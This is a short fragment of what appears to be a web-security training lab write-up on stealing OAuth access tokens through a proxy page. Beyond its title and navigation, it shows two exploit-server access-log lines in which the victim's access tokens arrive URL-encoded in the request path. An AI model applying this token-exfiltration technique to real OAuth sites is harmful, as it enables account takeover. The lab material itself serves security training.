Lab: Stealing OAuth access tokens via a proxy page
PreviousLab: Stealing OAuth access tokens via an open redirectNextLab: SSRF via OpenID dynamic client registration
Last updated
Last updated
27.72.144.83 2024-08-22 10:51:35 +0000 "GET /https%3A%2F%2F0a9d000103b07fd981683400000900f8.web-security-academy.net%2Fpost%2Fcomment%2Fcomment-form%23access_token%3Dx0h-5fWvDDI0p0xcES7TPNp4540jon4Jo1RqKhXBiEN%26expires_in%3D3600%26token_type%3DBearer%26scope%3Dopenid%2520profile%2520email HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36"10.0.3.127 2024-08-22 10:52:54 +0000 "GET /https%3A%2F%2F0a9d000103b07fd981683400000900f8.web-security-academy.net%2Fpost%2Fcomment%2Fcomment-form%23access_token%3DytAVVyIobqqyZUwib7QgkZ6SUlvLeljy4jdPiuyH1AK%26expires_in%3D3600%26token_type%3DBearer%26scope%3Dopenid%2520profile%2520email HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"